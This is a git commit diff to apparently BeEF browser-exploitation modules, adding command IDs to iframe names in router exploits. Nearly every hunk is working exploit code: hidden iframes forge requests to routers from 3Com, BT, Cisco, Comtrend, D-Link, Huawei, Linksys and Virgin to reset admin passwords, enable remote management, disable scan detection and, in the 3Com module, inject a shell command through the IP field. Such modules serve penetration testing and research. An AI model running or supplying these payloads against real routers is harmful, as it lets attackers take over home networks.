Add command_id to embedded iframe/img IDs for router exploits
This prevents a race condition where duplicate iframes/imgs are created if a module is run twice simultaneously. The second iframe/img was not being removed during `cleanup()`.
This commit is contained in:
bcoles
@@ -9,8 +9,9 @@ beef.execute(function() {
|
||||
var gateway = '<%= @base %>';
|
||||
var path = 'utility.cgi';
|
||||
var cmd = '<%= @cmd %>';
|
||||
var timeout = 15;
|
||||
|
||||
var com_officeconnect_iframe = beef.dom.createIframeXsrfForm(gateway + path, "GET", [
|
||||
var com_officeconnect_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + path, "GET", [
|
||||
{'type':'hidden', 'name':'testType', 'value':'1'},
|
||||
{'type':'hidden', 'name':'IP', 'value':'||'+cmd}
|
||||
]);
|
||||
@@ -18,9 +19,9 @@ beef.execute(function() {
|
||||
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
|
||||
|
||||
cleanup = function() {
|
||||
document.body.removeChild(com_officeconnect_iframe);
|
||||
document.body.removeChild(com_officeconnect_iframe_<%= @command_id %>);
|
||||
}
|
||||
setTimeout("cleanup()", 15000);
|
||||
setTimeout("cleanup()", timeout*1000);
|
||||
|
||||
});
|
||||
|
||||
|
||||
@@ -14,7 +14,7 @@ beef.execute(function() {
|
||||
img.setAttribute("style","visibility:hidden");
|
||||
img.setAttribute("width","0");
|
||||
img.setAttribute("height","0");
|
||||
img.id = 'asmax_ar804gu';
|
||||
img.id = 'asmax_ar804gu_<%= @command_id %>';
|
||||
img.src = gateway+path+cmd;
|
||||
document.body.appendChild(img);
|
||||
|
||||
|
||||
@@ -6,21 +6,21 @@
|
||||
|
||||
beef.execute(function() {
|
||||
var gateway = '<%= @base %>';
|
||||
var passwd = '<%= @password %>';
|
||||
var passwd = '<%= @password %>';
|
||||
var timeout = 15;
|
||||
|
||||
|
||||
|
||||
var bt_home_hub_iframe = beef.dom.createIframeXsrfForm(gateway + "/cgi/b/ras//?ce=1&be=1&l0=5&l1=5", "POST",
|
||||
[{'type':'hidden', 'name':'0', 'value':'31'} ,
|
||||
{'type':'hidden', 'name':'1', 'value':''},
|
||||
{'type':'hidden', 'name':'30', 'value':passwd}]);
|
||||
var bt_home_hub_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "/cgi/b/ras//?ce=1&be=1&l0=5&l1=5", "POST", [
|
||||
{'type':'hidden', 'name':'0', 'value':'31'} ,
|
||||
{'type':'hidden', 'name':'1', 'value':''},
|
||||
{'type':'hidden', 'name':'30', 'value':passwd}
|
||||
]);
|
||||
|
||||
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
|
||||
|
||||
cleanup = function() {
|
||||
document.body.removeChild(bt_home_hub_iframe);
|
||||
document.body.removeChild(bt_home_hub_iframe_<%= @command_id %>);
|
||||
}
|
||||
setTimeout("cleanup()", 15000);
|
||||
setTimeout("cleanup()", timeout*1000);
|
||||
|
||||
});
|
||||
|
||||
|
||||
@@ -7,8 +7,9 @@
|
||||
beef.execute(function() {
|
||||
var gateway = '<%= @base %>';
|
||||
var passwd = '<%= @password %>';
|
||||
var timeout = 15;
|
||||
|
||||
var cisco_e2400_iframe1 = beef.dom.createIframeXsrfForm(gateway + "apply.cgi", "POST",
|
||||
var cisco_e2400_iframe1_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "apply.cgi", "POST",
|
||||
[
|
||||
{'type':'hidden', 'name':'submit_button', 'value':'Management'},
|
||||
{'type':'hidden', 'name':'change_action', 'value':''},
|
||||
@@ -37,7 +38,7 @@ beef.execute(function() {
|
||||
{'type':'hidden', 'name':'upnp_internet_dis', 'value':'0'},
|
||||
]);
|
||||
|
||||
var cisco_e2400_iframe2 = beef.dom.createIframeXsrfForm(gateway + "apply.cgi", "POST",
|
||||
var cisco_e2400_iframe2_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "apply.cgi", "POST",
|
||||
[
|
||||
{'type':'hidden', 'name':'submit_button', 'value':'Firewall'},
|
||||
{'type':'hidden', 'name':'change_action', 'value':''},
|
||||
@@ -59,10 +60,10 @@ beef.execute(function() {
|
||||
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
|
||||
|
||||
cleanup = function() {
|
||||
document.body.removeChild(cisco_e2400_iframe1);
|
||||
document.body.removeChild(cisco_e2400_iframe2);
|
||||
document.body.removeChild(cisco_e2400_iframe1_<%= @command_id %>);
|
||||
document.body.removeChild(cisco_e2400_iframe2_<%= @command_id %>);
|
||||
}
|
||||
setTimeout("cleanup()", 15000);
|
||||
setTimeout("cleanup()", timeout*1000);
|
||||
|
||||
});
|
||||
|
||||
|
||||
@@ -6,12 +6,13 @@
|
||||
|
||||
beef.execute(function() {
|
||||
var gateway = '<%= @base %>';
|
||||
var passwd = '<%= @password %>';
|
||||
var passwd = '<%= @password %>';
|
||||
var timeout = 15;
|
||||
|
||||
var ct5367_iframe1 = beef.dom.createInvisibleIframe();
|
||||
ct5367_iframe1.setAttribute('src', gateway+'scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3');
|
||||
var ct5367_iframe1_<%= @command_id %> = beef.dom.createInvisibleIframe();
|
||||
ct5367_iframe1_<%= @command_id %>.setAttribute('src', gateway+'scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3');
|
||||
|
||||
var ct5367_iframe2 = beef.dom.createInvisibleIframe();
|
||||
var ct5367_iframe2_<%= @command_id %> = beef.dom.createInvisibleIframe();
|
||||
|
||||
var form = document.createElement('form');
|
||||
form.setAttribute('action', gateway + "password.cgi");
|
||||
@@ -37,16 +38,16 @@ beef.execute(function() {
|
||||
input.setAttribute('value', passwd);
|
||||
form.appendChild(input);
|
||||
|
||||
ct5367_iframe2.contentWindow.document.body.appendChild(form);
|
||||
ct5367_iframe2_<%= @command_id %>.contentWindow.document.body.appendChild(form);
|
||||
form.submit();
|
||||
|
||||
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
|
||||
|
||||
cleanup = function() {
|
||||
document.body.removeChild(ct5367_iframe1);
|
||||
document.body.removeChild(ct5367_iframe2);
|
||||
document.body.removeChild(ct5367_iframe1_<%= @command_id %>);
|
||||
document.body.removeChild(ct5367_iframe2_<%= @command_id %>);
|
||||
}
|
||||
setTimeout("cleanup()", 15000);
|
||||
setTimeout("cleanup()", timeout*1000);
|
||||
|
||||
});
|
||||
|
||||
|
||||
@@ -6,21 +6,22 @@
|
||||
|
||||
beef.execute(function() {
|
||||
var gateway = '<%= @base %>';
|
||||
var passwd = '<%= @password %>';
|
||||
var passwd = '<%= @password %>';
|
||||
var timeout = 15;
|
||||
|
||||
var ct5367_iframe1 = beef.dom.createInvisibleIframe();
|
||||
ct5367_iframe1.setAttribute('src', gateway+'scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3');
|
||||
var ct5367_iframe1_<%= @command_id %> = beef.dom.createInvisibleIframe();
|
||||
ct5367_iframe1_<%= @command_id %>.setAttribute('src', gateway+'scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3');
|
||||
|
||||
var ct5367_iframe2 = beef.dom.createInvisibleIframe();
|
||||
ct5367_iframe2.setAttribute('src', gateway+'/password.cgi?usrPassword='+passwd+'&sysPassword='+passwd+'&sptPassword='+passwd);
|
||||
var ct5367_iframe2_<%= @command_id %> = beef.dom.createInvisibleIframe();
|
||||
ct5367_iframe2_<%= @command_id %>.setAttribute('src', gateway+'/password.cgi?usrPassword='+passwd+'&sysPassword='+passwd+'&sptPassword='+passwd);
|
||||
|
||||
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
|
||||
|
||||
cleanup = function() {
|
||||
document.body.removeChild(ct5367_iframe1);
|
||||
document.body.removeChild(ct5367_iframe2);
|
||||
document.body.removeChild(ct5367_iframe1_<%= @command_id %>);
|
||||
document.body.removeChild(ct5367_iframe2_<%= @command_id %>);
|
||||
}
|
||||
setTimeout("cleanup()", 15000);
|
||||
setTimeout("cleanup()", timeout*1000);
|
||||
|
||||
});
|
||||
|
||||
|
||||
@@ -7,8 +7,9 @@
|
||||
beef.execute(function() {
|
||||
var gateway = '<%= @base %>';
|
||||
var passwd = '<%= @password %>';
|
||||
var timeout = 15;
|
||||
|
||||
var dir615_iframe = beef.dom.createIframeXsrfForm(gateway + "tools_admin.php", "POST",
|
||||
var dir615_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "tools_admin.php", "POST",
|
||||
[{'type':'hidden', 'name':'ACTION_POST', 'value':'1'} ,
|
||||
{'type':'hidden', 'name':'apply', 'value':'Save Settings'},
|
||||
{'type':'hidden', 'name':'admin_name', 'value':'admin'},
|
||||
@@ -23,9 +24,9 @@ beef.execute(function() {
|
||||
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
|
||||
|
||||
cleanup = function() {
|
||||
document.body.removeChild(dir615_iframe);
|
||||
document.body.removeChild(dir615_iframe_<%= @command_id %>);
|
||||
}
|
||||
setTimeout("cleanup()", 15000);
|
||||
setTimeout("cleanup()", timeout*1000);
|
||||
|
||||
});
|
||||
|
||||
|
||||
@@ -6,9 +6,10 @@
|
||||
|
||||
beef.execute(function() {
|
||||
var gateway = '<%= @base %>';
|
||||
var passwd = '<%= @password %>';
|
||||
var passwd = '<%= @password %>';
|
||||
var timeout = 15;
|
||||
|
||||
var dsl500t_iframe = beef.dom.createIframeXsrfForm(gateway + "cgi-bin/webcm", "POST",
|
||||
var dsl500t_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "cgi-bin/webcm", "POST",
|
||||
[{'type':'hidden', 'name':'getpage', 'value':'../html/tools/usrmgmt.htm'} ,
|
||||
{'type':'hidden', 'name':'security:settings/username', 'value':'admin'},
|
||||
{'type':'hidden', 'name':'security:settings/password', 'value':passwd},
|
||||
@@ -19,9 +20,9 @@ beef.execute(function() {
|
||||
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
|
||||
|
||||
cleanup = function() {
|
||||
document.body.removeChild(dsl500t_iframe);
|
||||
document.body.removeChild(dsl500t_iframe_<%= @command_id %>);
|
||||
}
|
||||
setTimeout("cleanup()", 15000);
|
||||
setTimeout("cleanup()", timeout*1000);
|
||||
|
||||
});
|
||||
|
||||
|
||||
@@ -5,19 +5,20 @@
|
||||
//
|
||||
|
||||
beef.execute(function() {
|
||||
var gateway = '<%= @base %>';
|
||||
var gateway = '<%= @base %>';
|
||||
var username = '<%= @username %>';
|
||||
var passwd = '<%= @password %>';
|
||||
var passwd = '<%= @password %>';
|
||||
var timeout = 15;
|
||||
|
||||
var huawei_smartax_mt880_iframe = beef.dom.createInvisibleIframe();
|
||||
huawei_smartax_mt880_iframe.setAttribute('src', gateway+"Action?user_id="+username+"&priv=1&pass1="+passwd+"&pass2="+passwd+"&id=70");
|
||||
var huawei_smartax_mt880_iframe_<%= @command_id %> = beef.dom.createInvisibleIframe();
|
||||
huawei_smartax_mt880_iframe_<%= @command_id %>.setAttribute('src', gateway+"Action?user_id="+username+"&priv=1&pass1="+passwd+"&pass2="+passwd+"&id=70");
|
||||
|
||||
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
|
||||
|
||||
cleanup = function() {
|
||||
document.body.removeChild(huawei_smartax_mt880_iframe);
|
||||
document.body.removeChild(huawei_smartax_mt880_iframe_<%= @command_id %>);
|
||||
}
|
||||
setTimeout("cleanup()", 15000);
|
||||
setTimeout("cleanup()", timeout*1000);
|
||||
|
||||
});
|
||||
|
||||
|
||||
@@ -5,15 +5,17 @@
|
||||
//
|
||||
|
||||
beef.execute(function() {
|
||||
var timeout = 15;
|
||||
|
||||
var befsr41_iframe_<%= @command_id %> = beef.dom.createInvisibleIframe();
|
||||
befsr41_iframe_<%= @command_id %>.setAttribute('src', '<%= @base %>Gozila.cgi?PasswdModify=1&sysPasswd=<%= @password %>&sysPasswdConfirm=<%= @password %>&Remote_Upgrade=1&Remote_Management=1&RemotePort=<%= @port %>&UPnP_Work=0');
|
||||
|
||||
var befsr41_iframe = beef.dom.createInvisibleIframe();
|
||||
befsr41_iframe.setAttribute('src', '<%= @base %>Gozila.cgi?PasswdModify=1&sysPasswd=<%= @password %>&sysPasswdConfirm=<%= @password %>&Remote_Upgrade=1&Remote_Management=1&RemotePort=<%= @port %>&UPnP_Work=0');
|
||||
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
|
||||
|
||||
cleanup = function() {
|
||||
document.body.removeChild(befsr41_iframe);
|
||||
document.body.removeChild(befsr41_iframe_<%= @command_id %>);
|
||||
}
|
||||
setTimeout("cleanup()", 15000);
|
||||
setTimeout("cleanup()", timeout*1000);
|
||||
|
||||
});
|
||||
|
||||
|
||||
@@ -5,11 +5,12 @@
|
||||
//
|
||||
|
||||
beef.execute(function() {
|
||||
var port = '<%= @port %>';
|
||||
var port = '<%= @port %>';
|
||||
var gateway = '<%= @base %>';
|
||||
var passwd = '<%= @password %>';
|
||||
var passwd = '<%= @password %>';
|
||||
var timeout = 15;
|
||||
|
||||
var wrt54g2_iframe = beef.dom.createIframeXsrfForm(gateway + "Manage.tri", "POST",
|
||||
var wrt54g2_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "Manage.tri", "POST",
|
||||
[{'type':'hidden', 'name':'MANAGE_USE_HTTP', 'value':'0'} ,
|
||||
{'type':'hidden', 'name':'MANAGE_HTTP', 'value':'1'},
|
||||
{'type':'hidden', 'name':'MANAGE_HTTP_S', 'value':'0'},
|
||||
@@ -27,9 +28,9 @@ beef.execute(function() {
|
||||
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
|
||||
|
||||
cleanup = function() {
|
||||
document.body.removeChild(wrt54g2_iframe);
|
||||
document.body.removeChild(wrt54g2_iframe_<%= @command_id %>);
|
||||
}
|
||||
setTimeout("cleanup()", 15000);
|
||||
setTimeout("cleanup()", timeout*1000);
|
||||
|
||||
});
|
||||
|
||||
|
||||
@@ -5,31 +5,33 @@
|
||||
//
|
||||
|
||||
beef.execute(function() {
|
||||
var port = '<%= @port %>';
|
||||
var port = '<%= @port %>';
|
||||
var gateway = '<%= @base %>';
|
||||
var passwd = '<%= @password %>';
|
||||
var passwd = '<%= @password %>';
|
||||
var timeout = 15;
|
||||
|
||||
var wrt54g_iframe = beef.dom.createIframeXsrfForm(gateway + "manage.tri", "POST",
|
||||
[{'type':'hidden', 'name':'remote_mgt_https', 'value':'0'} ,
|
||||
{'type':'hidden', 'name':'http_enable', 'value':'1'},
|
||||
{'type':'hidden', 'name':'https_enable', 'value':'0'},
|
||||
{'type':'hidden', 'name':'PasswdModify', 'value':'1'},
|
||||
{'type':'hidden', 'name':'http_passwd', 'value':passwd},
|
||||
var wrt54g_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "manage.tri", "POST",
|
||||
[
|
||||
{'type':'hidden', 'name':'remote_mgt_https', 'value':'0'} ,
|
||||
{'type':'hidden', 'name':'http_enable', 'value':'1'},
|
||||
{'type':'hidden', 'name':'https_enable', 'value':'0'},
|
||||
{'type':'hidden', 'name':'PasswdModify', 'value':'1'},
|
||||
{'type':'hidden', 'name':'http_passwd', 'value':passwd},
|
||||
{'type':'hidden', 'name':'http_passwdConfirm', 'value':passwd},
|
||||
{'type':'hidden', 'name':'_http_enable', 'value':'1'},
|
||||
{'type':'hidden', 'name':'remote_management', 'value':'1'},
|
||||
{'type':'hidden', 'name':'web_wl_filter', 'value':'1'},
|
||||
{'type':'hidden', 'name':'http_wanport', 'value':port},
|
||||
{'type':'hidden', 'name':'upnp_enable', 'value':'1'},
|
||||
{'type':'hidden', 'name':'layout', 'value':'en'}
|
||||
{'type':'hidden', 'name':'_http_enable', 'value':'1'},
|
||||
{'type':'hidden', 'name':'remote_management', 'value':'1'},
|
||||
{'type':'hidden', 'name':'web_wl_filter', 'value':'1'},
|
||||
{'type':'hidden', 'name':'http_wanport', 'value':port},
|
||||
{'type':'hidden', 'name':'upnp_enable', 'value':'1'},
|
||||
{'type':'hidden', 'name':'layout', 'value':'en'}
|
||||
]);
|
||||
|
||||
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
|
||||
|
||||
cleanup = function() {
|
||||
document.body.removeChild(wrt54g_iframe);
|
||||
document.body.removeChild(wrt54g_iframe_<%= @command_id %>);
|
||||
}
|
||||
setTimeout("cleanup()", 15000);
|
||||
setTimeout("cleanup()", timeout*1000);
|
||||
|
||||
});
|
||||
|
||||
|
||||
@@ -9,30 +9,31 @@ beef.execute(function() {
|
||||
var gateway = '<%= @base %>';
|
||||
var passwd = '<%= @password %>';
|
||||
var port = '<%= @port %>';
|
||||
var timeout = 15;
|
||||
|
||||
var virgin_superhub_iframe1 = beef.dom.createIframeXsrfForm(gateway + "goform/RgSecurity", "POST", [
|
||||
{'type':'hidden', 'name':'NetgearPassword', 'value':passwd},
|
||||
var virgin_superhub_iframe1_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "goform/RgSecurity", "POST", [
|
||||
{'type':'hidden', 'name':'NetgearPassword', 'value':passwd},
|
||||
{'type':'hidden', 'name':'NetgearPasswordReEnter', 'value':passwd},
|
||||
{'type':'hidden', 'name':'RestoreFactoryNo', 'value':'0x00'}
|
||||
{'type':'hidden', 'name':'RestoreFactoryNo', 'value':'0x00'}
|
||||
]);
|
||||
|
||||
var virgin_superhub_iframe2 = beef.dom.createIframeXsrfForm(gateway + "goform/RgServices", "POST", [
|
||||
{'type':'hidden', 'name':'cbPortScanDetection', 'value':''}
|
||||
var virgin_superhub_iframe2_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "goform/RgServices", "POST", [
|
||||
{'type':'hidden', 'name':'cbPortScanDetection', 'value':''}
|
||||
]);
|
||||
|
||||
var virgin_superhub_iframe3 = beef.dom.createIframeXsrfForm(gateway + "goform/RgVMRemoteManagementRes", "POST", [
|
||||
{'type':'hidden', 'name':'NetgearVMRmEnable', 'value':'0x01'},
|
||||
{'type':'hidden', 'name':'NetgearVMRmPortNumber', 'value':port}
|
||||
var virgin_superhub_iframe3_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "goform/RgVMRemoteManagementRes", "POST", [
|
||||
{'type':'hidden', 'name':'NetgearVMRmEnable', 'value':'0x01'},
|
||||
{'type':'hidden', 'name':'NetgearVMRmPortNumber', 'value':port}
|
||||
]);
|
||||
|
||||
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
|
||||
|
||||
cleanup = function() {
|
||||
document.body.removeChild(virgin_superhub_iframe1);
|
||||
document.body.removeChild(virgin_superhub_iframe2);
|
||||
document.body.removeChild(virgin_superhub_iframe3);
|
||||
document.body.removeChild(virgin_superhub_iframe1_<%= @command_id %>);
|
||||
document.body.removeChild(virgin_superhub_iframe2_<%= @command_id %>);
|
||||
document.body.removeChild(virgin_superhub_iframe3_<%= @command_id %>);
|
||||
}
|
||||
setTimeout("cleanup()", 15000);
|
||||
setTimeout("cleanup()", timeout*1000);
|
||||
|
||||
});
|
||||
|
||||
|
||||
Reference in New Issue
Block a user